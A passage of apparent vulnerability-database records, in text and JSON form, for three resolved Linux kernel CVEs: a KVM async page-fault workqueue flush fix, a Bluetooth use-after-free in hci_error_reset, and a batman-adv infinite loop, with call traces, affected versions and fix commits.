async_pf_execute+0x198/0x260 [kvm]\n  process_one_work+0x145/0x2d0\n  worker_thread+0x27e/0x3a0\n  kthread+0xba/0xe0\n  ret_from_fork+0x2d/0x50\n  ret_from_fork_asm+0x11/0x20\n  \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n INFO: task kworker/8:1:251 blocked for more than 120 seconds.\n       Tainted: G        W          6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:kworker/8:1     state:D stack:0     pid:251   ppid:2      flags:0x00004000\n Workqueue: events async_pf_execute [kvm]\n Call Trace:\n  \u003cTASK\u003e\n  __schedule+0x33f/0xa40\n  schedule+0x53/0xc0\n  schedule_timeout+0x12a/0x140\n  __wait_for_common+0x8d/0x1d0\n  __flush_work.isra.0+0x19f/0x2c0\n  kvm_clear_async_pf_completion_queue+0x129/0x190 [kvm]\n  kvm_arch_destroy_vm+0x78/0x1b0 [kvm]\n  kvm_put_kvm+0x1c1/0x320 [kvm]\n  async_pf_execute+0x198/0x260 [kvm]\n  process_one_work+0x145/0x2d0\n  worker_thread+0x27e/0x3a0\n  kthread+0xba/0xe0\n  ret_from_fork+0x2d/0x50\n  ret_from_fork_asm+0x11/0x20\n  \u003c/TASK\u003e\n\nIf kvm_clear_async_pf_completion_queue() actually flushes the workqueue,\nthen there\u0027s no need to gift async_pf_execute() a reference because all\ninvocations of async_pf_execute() will be forced to complete before the\nvCPU and its VM are destroyed/freed.  And that in turn fixes the module\nunloading bug as __fput() won\u0027t do module_put() on the last vCPU reference\nuntil the vCPU has been freed, e.g. if closing the vCPU file also puts the\nlast reference to the KVM module.\n\nNote that kvm_check_async_pf_completion() may also take the work item off\nthe completion queue and so also needs to flush the work queue, as the\nwork will not be seen by kvm_clear_async_pf_completion_queue().  Waiting\non the workqueue could theoretically delay a vCPU due to waiting for the\nwork to complete, but that\u0027s a very, very small chance, and likely a very\nsmall delay.  kvm_arch_async_page_present_queued() unconditionally makes a\nnew request, i.e. will effectively delay entering the guest, so the\nremaining work is really just:\n\n        trace_kvm_async_pf_completed(addr, cr2_or_gpa);\n\n        __kvm_vcpu_wake_up(vcpu);\n\n        mmput(mm);\n\nand mmput() can\u0027t drop the last reference to the page tables if the vCPU is\nstill alive, i.e. the vCPU won\u0027t get stuck tearing down page tables.\n\nAdd a helper to do the flushing, specifically to deal with \"wakeup all\"\nwork items, as they aren\u0027t actually work items, i.e. are never placed in a\nworkqueue.  Trying to flush a bogus workqueue entry rightly makes\n__flush_work() complain (kudos to whoever added that sanity check).\n\nNote, commit 5f6de5cbebee (\"KVM: Prevent module exit until al\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:18.606Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ab2c2f5d9576112ad22cfd3798071cb74693b1f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/82e25cc1c2e93c3023da98be282322fc08b61ffb"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8730d6335e5f43d09151fca1f0f41922209a264"
        },
        {
          "url": "https://git.kernel.org/stable/c/83d3c5e309611ef593e2fcb78444fc8ceedf9bac"
        },
        {
          "url": "https://git.kernel.org/stable/c/b54478d20375874aeee257744dedfd3e413432ff"
        },
        {
          "url": "https://git.kernel.org/stable/c/a75afe480d4349c524d9c659b1a5a544dbc39a98"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f3a3bce428fb439c66a578adc447afce7b4a750"
        },
        {
          "url": "https://git.kernel.org/stable/c/caa9af2e27c275e089d702cfbaaece3b42bca31b"
        },
        {
          "url": "https://git.kernel.org/stable/c/3d75b8aa5c29058a512db29da7cbee8052724157"
        }
      ],
      "title": "KVM: Always flush async #PF workqueue when vCPU is being destroyed",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26976",
    "datePublished": "2024-05-01T05:20:24.025Z",
    "dateReserved": "2024-02-19T14:20:24.203Z",
    "dateUpdated": "2025-05-04T09:01:18.606Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26801 (GCVE-0-2024-26801)

Vulnerability from cvelistv5 – Published: 2024-04-04 08:20 – Updated: 2025-05-04 08:56

Title

Bluetooth: Avoid potential use-after-free in hci_error_reset

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Avoid potential use-after-free in hci_error_reset While handling the HCI_EV_HARDWARE_ERROR event, if the underlying BT controller is not responding, the GPIO reset mechanism would free the hci_dev and lead to a use-after-free in hci_error_reset. Here's the call trace observed on a ChromeOS device with Intel AX201: queue_work_on+0x3e/0x6c __hci_cmd_sync_sk+0x2ee/0x4c0 [bluetooth <HASH:3b4a6>] ? init_wait_entry+0x31/0x31 __hci_cmd_sync+0x16/0x20 [bluetooth <HASH:3b4a 6>] hci_error_reset+0x4f/0xa4 [bluetooth <HASH:3b4a 6>] process_one_work+0x1d8/0x33f worker_thread+0x21b/0x373 kthread+0x13a/0x152 ? pr_cont_work+0x54/0x54 ? kthread_blkcg+0x31/0x31 ret_from_fork+0x1f/0x30 This patch holds the reference count on the hci_dev while processing a HCI_EV_HARDWARE_ERROR event to avoid potential crash.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e0b278650f07acf2e…
	https://git.kernel.org/stable/c/98fb98fd37e42fd4c…
	https://git.kernel.org/stable/c/6dd0a9dfa99f8990a…
	https://git.kernel.org/stable/c/da4569d450b193e39…
	https://git.kernel.org/stable/c/45085686b9559bfbe…
	https://git.kernel.org/stable/c/2ab9a19d896f5a0dd…
	https://git.kernel.org/stable/c/dd594cdc24f2e48da…
	https://git.kernel.org/stable/c/2449007d3f73b2842…

Impacted products

Vendor

Product

Version

Linux

Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < e0b278650f07acf2e0932149183458468a731c03 (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < 98fb98fd37e42fd4ce13ff657ea64503e24b6090 (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < 6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2 (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < da4569d450b193e39e87119fd316c0291b585d14 (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < 45085686b9559bfbe3a4f41d3d695a520668f5e1 (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < 2ab9a19d896f5a0dd386e1f001c5309bc35f433b (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < dd594cdc24f2e48dab441732e6dfcafd6b0711d1 (git)
Affected: c7741d16a57cbf97eebe53f27e8216b1ff20e20c , < 2449007d3f73b2842c9734f45f0aadb522daf592 (git)

Linux

Affected: 4.0
Unaffected: 0 , < 4.0 (semver)
Unaffected: 4.19.309 , ≤ 4.19.* (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.522Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e0b278650f07acf2e0932149183458468a731c03"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98fb98fd37e42fd4ce13ff657ea64503e24b6090"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/da4569d450b193e39e87119fd316c0291b585d14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/45085686b9559bfbe3a4f41d3d695a520668f5e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2ab9a19d896f5a0dd386e1f001c5309bc35f433b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd594cdc24f2e48dab441732e6dfcafd6b0711d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2449007d3f73b2842c9734f45f0aadb522daf592"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26801",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-15T19:27:12.303916Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-15T19:27:19.532Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e0b278650f07acf2e0932149183458468a731c03",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "98fb98fd37e42fd4ce13ff657ea64503e24b6090",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "da4569d450b193e39e87119fd316c0291b585d14",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "45085686b9559bfbe3a4f41d3d695a520668f5e1",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "2ab9a19d896f5a0dd386e1f001c5309bc35f433b",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "dd594cdc24f2e48dab441732e6dfcafd6b0711d1",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            },
            {
              "lessThan": "2449007d3f73b2842c9734f45f0aadb522daf592",
              "status": "affected",
              "version": "c7741d16a57cbf97eebe53f27e8216b1ff20e20c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.0"
            },
            {
              "lessThan": "4.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.309",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.309",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Avoid potential use-after-free in hci_error_reset\n\nWhile handling the HCI_EV_HARDWARE_ERROR event, if the underlying\nBT controller is not responding, the GPIO reset mechanism would\nfree the hci_dev and lead to a use-after-free in hci_error_reset.\n\nHere\u0027s the call trace observed on a ChromeOS device with Intel AX201:\n   queue_work_on+0x3e/0x6c\n   __hci_cmd_sync_sk+0x2ee/0x4c0 [bluetooth \u003cHASH:3b4a6\u003e]\n   ? init_wait_entry+0x31/0x31\n   __hci_cmd_sync+0x16/0x20 [bluetooth \u003cHASH:3b4a 6\u003e]\n   hci_error_reset+0x4f/0xa4 [bluetooth \u003cHASH:3b4a 6\u003e]\n   process_one_work+0x1d8/0x33f\n   worker_thread+0x21b/0x373\n   kthread+0x13a/0x152\n   ? pr_cont_work+0x54/0x54\n   ? kthread_blkcg+0x31/0x31\n    ret_from_fork+0x1f/0x30\n\nThis patch holds the reference count on the hci_dev while processing\na HCI_EV_HARDWARE_ERROR event to avoid potential crash."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:56:52.344Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e0b278650f07acf2e0932149183458468a731c03"
        },
        {
          "url": "https://git.kernel.org/stable/c/98fb98fd37e42fd4ce13ff657ea64503e24b6090"
        },
        {
          "url": "https://git.kernel.org/stable/c/6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2"
        },
        {
          "url": "https://git.kernel.org/stable/c/da4569d450b193e39e87119fd316c0291b585d14"
        },
        {
          "url": "https://git.kernel.org/stable/c/45085686b9559bfbe3a4f41d3d695a520668f5e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/2ab9a19d896f5a0dd386e1f001c5309bc35f433b"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd594cdc24f2e48dab441732e6dfcafd6b0711d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/2449007d3f73b2842c9734f45f0aadb522daf592"
        }
      ],
      "title": "Bluetooth: Avoid potential use-after-free in hci_error_reset",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26801",
    "datePublished": "2024-04-04T08:20:29.211Z",
    "dateReserved": "2024-02-19T14:20:24.179Z",
    "dateUpdated": "2025-05-04T08:56:52.344Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35982 (GCVE-0-2024-35982)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 09:09

Title

batman-adv: Avoid infinite loop trying to resize local TT

Summary

In the Linux kernel, the following vulnerability has been resolved: batman-adv: Avoid infinite loop trying to resize local TT If the MTU of one of an attached interface becomes too small to transmit the local translation table then it must be resized to fit inside all fragments (when enabled) or a single packet. But if the MTU becomes too low to transmit even the header + the VLAN specific part then the resizing of the local TT will never succeed. This can for example happen when the usable space is 110 bytes and 11 VLANs are on top of batman-adv. In this case, at least 116 byte would be needed. There will just be an endless spam of batman_adv: batadv0: Forced to purge local tt entries to fit new maximum fragment MTU (110) in the log but the function will never finish. Problem here is that the timeout will be halved all the time and will then stagnate at 0 and therefore never be able to reduce the table even more. There are other scenarios possible with a similar result. The number of BATADV_TT_CLIENT_NOPURGE entries in the local TT can for example be too high to fit inside a packet. Such a scenario can therefore happen also with only a single VLAN + 7 non-purgable addresses - requiring at least 120 bytes. While this should be handled proactively when: * interface with too low MTU is added * VLAN is added * non-purgeable local mac is added * MTU of an attached interface is reduced * fragmentation setting gets disabled (which most likely requires dropping attached interfaces) not all of these scenarios can be prevented because batman-adv is only consuming events without the the possibility to prevent these actions (non-purgable MAC address added, MTU of an attached interface is reduced). It is therefore necessary to also make sure that the code is able to handle also the situations when there were already incompatible system configuration are present.

Severity ?

5.1 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/04720ea2e6c64459a…
	https://git.kernel.org/stable/c/b3ddf690407399049…
	https://git.kernel.org/stable/c/70a8be9dc2fb65d67…
	https://git.kernel.org/stable/c/87b6af1a7683e0217…
	https://git.kernel.org/stable/c/3fe79b2c83461edbb…
	https://git.kernel.org/stable/c/4ca2a5fb54ea2cc43…
	https://git.kernel.org/stable/c/ca54e2671548616ad…
	https://git.kernel.org/stable/c/b1f532a3b1e6d2e55…

Impacted products

Vendor

Product

Version

Linux

Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < 04720ea2e6c64459a90ca28570ea78335eccd924 (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < b3ddf6904073990492454b1dd1c10a24be8c74c6 (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < 70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < 87b6af1a7683e021710c08fc0551fc078346032f (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < 3fe79b2c83461edbbf86ed8a6f3924820ff89259 (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < 4ca2a5fb54ea2cc43edea614207fcede562d91c2 (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < ca54e2671548616ad34885f90d4f26f7adb088f0 (git)
Affected: a19d3d85e1b854e4a483a55d740a42458085560d , < b1f532a3b1e6d2e5559c7ace49322922637a28aa (git)

Linux

Affected: 3.13
Unaffected: 0 , < 3.13 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:3.13:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "3.13"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.1,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35982",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T13:42:24.669316Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-835",
                "description": "CWE-835 Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:51.361Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.996Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04720ea2e6c64459a90ca28570ea78335eccd924"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b3ddf6904073990492454b1dd1c10a24be8c74c6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87b6af1a7683e021710c08fc0551fc078346032f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3fe79b2c83461edbbf86ed8a6f3924820ff89259"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ca2a5fb54ea2cc43edea614207fcede562d91c2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca54e2671548616ad34885f90d4f26f7adb088f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b1f532a3b1e6d2e5559c7ace49322922637a28aa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/batman-adv/translation-table.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "04720ea2e6c64459a90ca28570ea78335eccd924",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "b3ddf6904073990492454b1dd1c10a24be8c74c6",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "87b6af1a7683e021710c08fc0551fc078346032f",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "3fe79b2c83461edbbf86ed8a6f3924820ff89259",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "4ca2a5fb54ea2cc43edea614207fcede562d91c2",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "ca54e2671548616ad34885f90d4f26f7adb088f0",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            },
            {
              "lessThan": "b1f532a3b1e6d2e5559c7ace49322922637a28aa",
              "status": "affected",
              "version": "a19d3d85e1b854e4a483a55d740a42458085560d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/batman-adv/translation-table.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13"
            },
            {
              "lessThan": "3.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
